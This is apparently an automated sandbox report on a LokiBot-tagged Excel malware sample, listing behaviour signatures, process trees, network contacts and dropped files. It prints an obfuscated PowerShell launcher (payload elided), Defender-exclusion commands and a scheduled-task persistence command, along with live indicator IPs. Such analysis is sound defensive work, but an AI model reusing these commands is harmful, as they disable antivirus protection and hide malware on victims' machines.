Malware Analysis Report

2025-04-03 09:49

Sample ID 241121-kvtvjazfka
Target f942a3046520f7838e33a1116faf8b9a6615756f044551651207f53b755a024d.xls
SHA256 f942a3046520f7838e33a1116faf8b9a6615756f044551651207f53b755a024d
Tags
lokibot collection defense_evasion discovery execution spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

f942a3046520f7838e33a1116faf8b9a6615756f044551651207f53b755a024d

Threat Level: Known bad

The file f942a3046520f7838e33a1116faf8b9a6615756f044551651207f53b755a024d.xls was found to be: Known bad.

Malicious Activity Summary

lokibot collection defense_evasion discovery execution spyware stealer trojan

Process spawned unexpected child process

Lokibot

Lokibot family

Evasion via Device Credential Deployment

Downloads MZ/PE file

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Executes dropped EXE

Reads user/profile data of web browsers

Loads dropped DLL

Accesses Microsoft Outlook profiles

Drops file in System32 directory

Suspicious use of SetThreadContext

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

outlook_win_path

Enumerates system info in registry

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: AddClipboardFormatListener

Modifies Internet Explorer settings

Scheduled Task/Job: Scheduled Task

Suspicious use of SetWindowsHookEx

Uses Volume Shadow Copy service COM API

Suspicious use of WriteProcessMemory

Uses Task Scheduler COM API

Checks processor information in registry

Uses Volume Shadow Copy WMI provider

outlook_office_path

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-21 08:55

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-21 08:55

Reported

2024-11-21 08:58

Platform

win7-20240903-en

Max time kernel

119s

Max time network

122s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\f942a3046520f7838e33a1116faf8b9a6615756f044551651207f53b755a024d.xls

Signatures

Lokibot

trojan spyware stealer lokibot

Lokibot family

lokibot

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Evasion via Device Credential Deployment

defense_evasion execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Users\Admin\AppData\Roaming\caspol.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Roaming\caspol.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Roaming\caspol.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe N/A
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2964 set thread context of 2568 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\caspol.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\caspol.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\caspol.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2712 wrote to memory of 2456 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe
PID 2456 wrote to memory of 2984 N/A C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2456 wrote to memory of 2920 N/A C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2920 wrote to memory of 1960 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2456 wrote to memory of 2964 N/A C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 2964 wrote to memory of 960 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2964 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2964 wrote to memory of 2056 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Windows\SysWOW64\schtasks.exe
PID 2964 wrote to memory of 1856 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 2964 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe
PID 2964 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Roaming\caspol.exe C:\Users\Admin\AppData\Roaming\caspol.exe

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Roaming\caspol.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Users\Admin\AppData\Roaming\caspol.exe N/A

Processes

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\f942a3046520f7838e33a1116faf8b9a6615756f044551651207f53b755a024d.xls

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe -Embedding

C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe

"C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'[base64 payload elided]'+[cHaR]0X22+'))')))"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zv9ghrdm.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCFCE.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCCFCD.tmp"

C:\Users\Admin\AppData\Roaming\caspol.exe

"C:\Users\Admin\AppData\Roaming\caspol.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\caspol.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\rrwscqkDSNwLK.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\Admin\AppData\Local\Temp\tmp4192.tmp"

C:\Users\Admin\AppData\Roaming\caspol.exe

"C:\Users\Admin\AppData\Roaming\caspol.exe"

C:\Users\Admin\AppData\Roaming\caspol.exe

"C:\Users\Admin\AppData\Roaming\caspol.exe"

C:\Users\Admin\AppData\Roaming\caspol.exe

"C:\Users\Admin\AppData\Roaming\caspol.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 provit.uk udp
GB 198.244.140.41:443 provit.uk tcp
US 8.8.8.8:53 r11.o.lencr.org udp
FR 23.1.254.170:80 r11.o.lencr.org tcp
US 192.3.243.136:80 192.3.243.136 tcp
GB 198.244.140.41:443 provit.uk tcp
US 192.3.243.136:80 192.3.243.136 tcp
US 192.3.243.136:80 192.3.243.136 tcp
US 8.8.8.8:53 crl.microsoft.com udp
FR 23.15.179.154:80 crl.microsoft.com tcp
US 8.8.8.8:53 www.microsoft.com udp
RO 2.20.118.102:80 www.microsoft.com tcp
DE 94.156.177.41:80 94.156.177.41 tcp
DE 94.156.177.41:80 94.156.177.41 tcp
DE 94.156.177.41:80 94.156.177.41 tcp
DE 94.156.177.41:80 94.156.177.41 tcp

Files

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\1087EC93233409051A3831D3D6C361C8

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\1087EC93233409051A3831D3D6C361C8

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

C:\Users\Admin\AppData\Local\Temp\CabC6D8.tmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DJB1KT77\greetingwithgreatthignsgivenbackwithentireprocessgivenmeback[1].hta

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

\??\c:\Users\Admin\AppData\Local\Temp\zv9ghrdm.cmdline

\??\c:\Users\Admin\AppData\Local\Temp\zv9ghrdm.0.cs

C:\Users\Admin\AppData\Local\Temp\RESCFCE.tmp

\??\c:\Users\Admin\AppData\Local\Temp\CSCCFCD.tmp

C:\Users\Admin\AppData\Local\Temp\zv9ghrdm.dll

C:\Users\Admin\AppData\Local\Temp\zv9ghrdm.pdb

C:\Users\Admin\AppData\Roaming\caspol.exe

\??\PIPE\srvsvc

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

C:\Users\Admin\AppData\Local\Temp\tmp4192.tmp

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3533259084-2542256011-65585152-1000\0f5007522459c86e95ffcc62f32308f1_38b42d9b-3e83-45f4-8789-a30be34574b0

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3533259084-2542256011-65585152-1000\0f5007522459c86e95ffcc62f32308f1_38b42d9b-3e83-45f4-8789-a30be34574b0

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-21 08:55

Reported

2024-11-21 08:58

Platform

win10v2004-20241007-en

Max time kernel

143s

Max time network

154s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\f942a3046520f7838e33a1116faf8b9a6615756f044551651207f53b755a024d.xls"

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process N/A C:\Windows\System32\mshta.exe C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4832 wrote to memory of 4136 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\System32\mshta.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\f942a3046520f7838e33a1116faf8b9a6615756f044551651207f53b755a024d.xls"

C:\Windows\System32\mshta.exe

C:\Windows\System32\mshta.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 152.254.1.23.in-addr.arpa udp
US 8.8.8.8:53 46.28.109.52.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
IE 52.109.76.243:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 provit.uk udp
GB 198.244.140.41:443 provit.uk tcp
US 8.8.8.8:53 243.76.109.52.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 r11.o.lencr.org udp
FR 23.1.254.145:80 r11.o.lencr.org tcp
US 192.3.243.136:80 192.3.243.136 tcp
US 8.8.8.8:53 41.140.244.198.in-addr.arpa udp
US 8.8.8.8:53 51.189.46.23.in-addr.arpa udp
US 8.8.8.8:53 145.254.1.23.in-addr.arpa udp
US 8.8.8.8:53 136.243.3.192.in-addr.arpa udp
US 8.8.8.8:53 136.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 175.117.168.52.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 216.254.1.23.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp

Files